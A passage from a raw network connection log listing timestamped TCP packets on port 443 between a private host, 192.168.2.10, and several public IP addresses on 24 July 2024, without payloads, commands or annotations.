Jul 24, 2024 19:57:02.972942114 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.972987890 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.973047018 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.973047018 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.973056078 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.973664045 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.973772049 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.973778963 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.973903894 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.973939896 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.973941088 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.973948002 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.974163055 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.975435972 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.975445032 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.976080894 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.986552954 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.986898899 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.986942053 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.986942053 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.986952066 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.987440109 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.987725973 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.987838030 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.987874985 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.987874985 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.987880945 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.988145113 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.989115000 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.989180088 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.989185095 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.989192009 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.989212036 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.989237070 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.989238024 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.991482019 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.991527081 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.991544008 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.991550922 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.991576910 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.991580963 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.992074013 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.992079973 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.992176056 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.993334055 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.993448973 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.993448973 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.043600082 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.045450926 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.063910007 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.064196110 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.064241886 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.064241886 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.064254045 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.064368010 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.064407110 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.064407110 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.064414978 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.064568043 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.064945936 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.064987898 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.064987898 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.064997911 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.065308094 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.065516949 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.065557003 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.065557003 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.065563917 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.065884113 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.066266060 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.066319942 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.066319942 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.066325903 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.066520929 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.067048073 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.067105055 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.067105055 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.067111969 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.067255020 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.067444086 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.067451000 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.069964886 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.071018934 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.071072102 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.071145058 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.071145058 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.071151018 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.071216106 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.071435928 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.071441889 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.071521997 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.071567059 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.071567059 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.071573973 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.071763992 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.072040081 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.072088957 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.072088957 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.072096109 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.072247982 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.072422028 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.072465897 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.072465897 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.072473049 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.074744940 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.074922085 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.074966908 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.074966908 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.074975014 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.075182915 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.075212002 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.075256109 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.075256109 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.075263023 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.082091093 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.082220078 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.082274914 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.082274914 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.082283974 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.086739063 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.086965084 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.087013006 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.087013006 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.087021112 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.087258101 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.087408066 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.087440968 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.087446928 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.091438055 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.122092009 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.138025045 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.138127089 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.138169050 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.138770103 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.159903049 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.160115004 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.160185099 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.160185099 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.160192966 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.160566092 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.160597086 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.160657883 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.160657883 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.160664082 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.161045074 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.161076069 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.161130905 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.161130905 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.161138058 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.161772013 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.161813974 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.161839962 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.161855936 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.161855936 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.161861897 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.161916018 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.161916018 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.162549019 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.162767887 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.162795067 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.162868977 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.162868977 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.162874937 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.164424896 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.164608002 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.164628983 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.164634943 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.164975882 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.165014029 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.165019035 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.165019035 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.165028095 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.165510893 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.165560961 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.165560961 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.165570021 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.165780067 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.165817022 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.165818930 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.165818930 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.165833950 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.165878057 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.165878057 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.166157007 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.167438030 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.170326948 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.170494080 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.170526981 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.170527935 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.170533895 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.170895100 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.171160936 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.171211958 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.171211958 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.171219110 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.177870989 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.178036928 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.178078890 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.178078890 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.178085089 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.183465004 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.183687925 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.183741093 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.183741093 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.183748007 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.235723019 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.235855103 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.235893965 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.235907078 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.235939026 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.257530928 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.257659912 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.257668018 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.257838011 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.257893085 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.257899046 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.258321047 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.258435011 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.258440018 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.258517027 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.258567095 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.258568048 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.258574009 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.259002924 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.259036064 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.259093046 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.259093046 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.259099960 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.259525061 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.259677887 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.259682894 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.259694099 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.259756088 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.259804964 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:03.263756990 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:03.700007915 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:03.700130939 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:03.700247049 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:03.702580929 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:03.702615023 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:03.804771900 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:03.804826021 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:03.804902077 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:03.805546045 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:03.805563927 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:04.023529053 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:04.023710012 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:04.023797035 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:04.042161942 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:04.042218924 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:04.042251110 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:04.042268038 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:04.147830009 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:04.147865057 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:04.147950888 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:04.148364067 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:04.148379087 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:04.292597055 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:04.292679071 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:04.297316074 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:04.297347069 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:04.297683954 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:04.298974991 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:04.298999071 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:04.299072981 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:04.770956993 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:04.771095991 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:04.774061918 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:04.774072886 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:04.774142027 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:04.774146080 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:04.774189949 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:04.774193048 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:04.774306059 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:04.774420977 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:04.820503950 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:05.217684984 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:05.217803001 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:05.217874050 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:05.218283892 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:05.218337059 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:05.218369961 CEST	49772	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:05.218388081 CEST	443	49772	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:05.312083006 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:06.155036926 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:06.155114889 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:06.155296087 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:06.173058033 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:06.173089027 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:06.173109055 CEST	49773	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:06.173116922 CEST	443	49773	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:06.288845062 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:06.288889885 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:06.288954020 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:06.289395094 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:06.289416075 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:06.991019964 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:06.991147041 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:06.993911982 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:06.993918896 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:06.993974924 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:06.993979931 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:06.994023085 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:06.994026899 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:06.994208097 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:06.995219946 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:06.995237112 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:07.876194000 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:07.876384020 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:07.876439095 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:07.930409908 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:07.930461884 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:07.930480003 CEST	49774	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:07.930488110 CEST	443	49774	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:08.042233944 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:08.042278051 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:08.042352915 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:08.042916059 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:08.042927027 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:08.653999090 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:08.654112101 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:08.657068014 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:08.657080889 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:08.657144070 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:08.657150030 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:08.657195091 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:08.657198906 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:08.657390118 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:08.657535076 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:08.704503059 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:09.912667036 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:09.912785053 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:09.912933111 CEST	49775	443	192.168.2.10	107.173.160.137
